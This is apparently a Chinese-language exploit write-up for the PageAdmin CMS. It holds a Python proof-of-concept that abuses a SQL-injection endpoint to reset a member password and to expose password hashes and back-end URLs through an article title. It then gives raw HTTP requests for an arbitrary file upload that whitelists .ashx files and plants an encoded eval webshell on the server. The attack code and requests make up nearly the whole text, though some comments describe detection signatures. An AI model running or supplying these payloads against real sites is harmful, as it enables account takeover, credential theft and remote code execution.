SQL注入

PoC

#!/usr/bin/env python
# -*- coding: utf-8 -*-


import urllib2
import urllib
import re
import sys

def main():
    """Dispatch on the command line: argv[1] is the site base URL, argv[2] the action.

    Every action posts to the same endpoint, ``<base>/e/aspx/post.aspx``; the
    three helpers differ in the ``thedata`` payload they send and the message
    they print afterwards.
    """
    url=sys.argv[1]+"/e/aspx/post.aspx"
    fun=sys.argv[2]
    if fun=='upass':
        update(url)
    elif fun=='sqlinject':
        sqlinject(url)
    elif fun=='Backstage':
        Backstage(url)
    else:
        # NOTE(review): the usage text below lists "uppass" while the dispatch
        # above matches "upass"; one of the two spellings is a typo.
        print'''
usage: pageadminsql.py http://www.baidu.com/ upass
parameter: uppass sqlinject Backstage
'''
def update(url):
    """POST a tokenised UPDATE against ``pa_member`` to ``post.aspx``.

    ``thedata`` carries a statement written with the endpoint's own tokens
    (``[u]`` update, ``[k]`` separator, ``[s]`` set, ``where``). The page
    presents this as SQL injection, i.e. the server presumably rebuilds a SQL
    statement from these client-supplied table/column/where fragments without
    parameterisation or an authentication check -- that is the flaw being
    demonstrated. This payload overwrites ``userpassword`` of the member row
    with ``id=2`` with a fixed hash literal.

    Defensive note: a POST to ``/e/aspx/post.aspx`` whose ``thedata`` contains
    ``[u][k]``/``[s][k]``/``[k]where[k]`` tokens is the signature of this
    traffic; the fix on the server side is to never accept table, column or
    where fragments from the client and to require an authenticated session.
    """
    # Referer is set to the target site itself; presumably the endpoint checks
    # it -- TODO confirm against the application.
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
    formate={
        "siteid":"1",
        "formtable":"1",
        "thedata":'[u][k]pa_member[k][s][k]userpassword="1527f10a11de5efea4b8516213413c103df55126"[k]where[k]id=2'
    }
    postdata = urllib.urlencode(formate)
    request = urllib2.Request(url, data=postdata, headers = headers)
    try:
        response = urllib2.urlopen(request)
        # Only the HTTP status is inspected: a 200 does not prove the row was
        # actually changed, so the "success" message can be a false positive.
        if response.getcode()==200:
            print u">>>>>>修改密码成功 修改密码:admin_1234213<<<<<<"
        pass
    except Exception as e:
        # Any transport or HTTP error is swallowed and reported as a failure;
        # the exception object itself is never shown.
        print u">>>>>>修改密码失败<<<<<<"
        pass
def sqlinject(url):
    """POST a tokenised multi-table UPDATE that copies a password hash into an article title.

    The payload names two tables (``article,pa_member``) and sets
    ``article.title`` from ``pa_member.userpassword`` for ``article.id=747``,
    so the stored hash becomes readable on the public article page whose URL is
    printed on success. The endpoint and token format are the same as in
    ``update``; the only differences are the ``thedata`` value and the message.

    Defensive note: same detection signature as ``update`` -- ``thedata`` with
    ``[u][k]``/``[s][k]``/``[k]where[k]`` tokens posted to ``/e/aspx/post.aspx``.
    """
    # Referer is set to the target site itself; presumably the endpoint checks
    # it -- TODO confirm against the application.
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
    formate={
        "siteid":"1",
        "formtable":"1",
        "thedata":"[u][k]article,pa_member[k][s][k]article.title=pa_member.userpassword[k]where[k]article.id=747"
    }
    postdata = urllib.urlencode(formate)
    request = urllib2.Request(url, data=postdata, headers = headers)
    try:
        response = urllib2.urlopen(request)
        # Only the HTTP status is inspected; a 200 does not confirm that the
        # title was actually rewritten.
        if response.getcode()==200:
            # sys.argv[1] (the base URL) is re-read here rather than derived
            # from the ``url`` parameter, which already has the endpoint appended.
            print u">>>>>>密码注入成功 查看密码地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
        pass
    except Exception as e:
        # Errors are swallowed; the exception object is never shown.
        print u">>>>>>密码注入失败<<<<<<"
        pass
def Backstage(url):
    """POST a tokenised multi-table UPDATE that copies a ``pa_log.url`` value into an article title.

    Structurally identical to ``sqlinject``: the payload names
    ``article,pa_log``, sets ``article.title`` from ``pa_log.url`` for
    ``article.id=747``, and on success prints the public article URL where the
    copied value (the page calls it the back-end address) can be read.

    Defensive note: same endpoint and token signature as ``update`` and
    ``sqlinject``; the server-side fix is identical.
    """
    # Referer is set to the target site itself; presumably the endpoint checks
    # it -- TODO confirm against the application.
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":url+"?a=pageadmin_cms"}
    formate={
        "siteid":"1",
        "formtable":"1",
        "thedata":"[u][k]article,pa_log[k][s][k]article.title=pa_log.url[k]where[k]article.id=747"
    }
    postdata = urllib.urlencode(formate)
    request = urllib2.Request(url, data=postdata, headers = headers)
    try:
        response = urllib2.urlopen(request)
        # Only the HTTP status is inspected; a 200 does not confirm the update.
        if response.getcode()==200:
            # Base URL is taken from sys.argv[1] again, not from ``url``.
            print u">>>>>>后台地址注入成功 查看后台地址:{0}/index.aspx?lanmuid=63&sublanmuid=654&id=747<<<<<<".format(sys.argv[1])
        pass
    except Exception as e:
        # Errors are swallowed; the exception object is never shown.
        print u">>>>>>后台地址注入失败<<<<<<"
        pass
# Script entry point; ``main`` reads its arguments straight from sys.argv.
if __name__ == '__main__':
    main()

前台任意文件上传

漏洞 URL: /e/aspx/upload.aspx?a=pageadmin_cms

先set增加ashx白名单

POST /e/aspx/upload.aspx?a=pageadmin_cms HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: https://www.safeinfo.me/e/aspx/upload.aspx?a=pageadmin_cms
Host: www.safeinfo.me
Content-Length: 106
Connection: Keep-Alive

submit=1&swf_upload=2&table=pa_field&field=file_ext=".jpg,.jpeg,.gif,.bmp,.ashx" where id=174 and max_num

response包

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Sat, 13 Jul 2019 07:52:02 GMT

<script type='text/javascript'>location.href='?result=cs_error'</script>

再次Post上传shell

POST /e/aspx/upload.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzBItOAbA8GrZ7s49
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: http://www.safeinfo.me/e/aspx/upload_p ... pic&from=master
Host: www.safeinfo.me
Content-Length: 2318


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="file"; filename="005.ashx"
Content-Type: image/jpeg

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;


public class Handler : IHttpHandler
{
public bool IsReusable
{
get
{
return false;
}
}
public void ProcessRequest(HttpContext context)
{
byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
try
{
File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/file.aspx",b);
context.Response.Write("oooooooookkkkkkkkk");
}
catch(Exception ex)
{
context.Response.Write(ex.Message);
}
context.Response.End();
}
}
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="width"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="height"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="url"


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="filesize"

0
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="sid"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="type"

file
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="table"

article
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="field"

titlepic
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="from"

master
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49--

最后在response会返回shell地址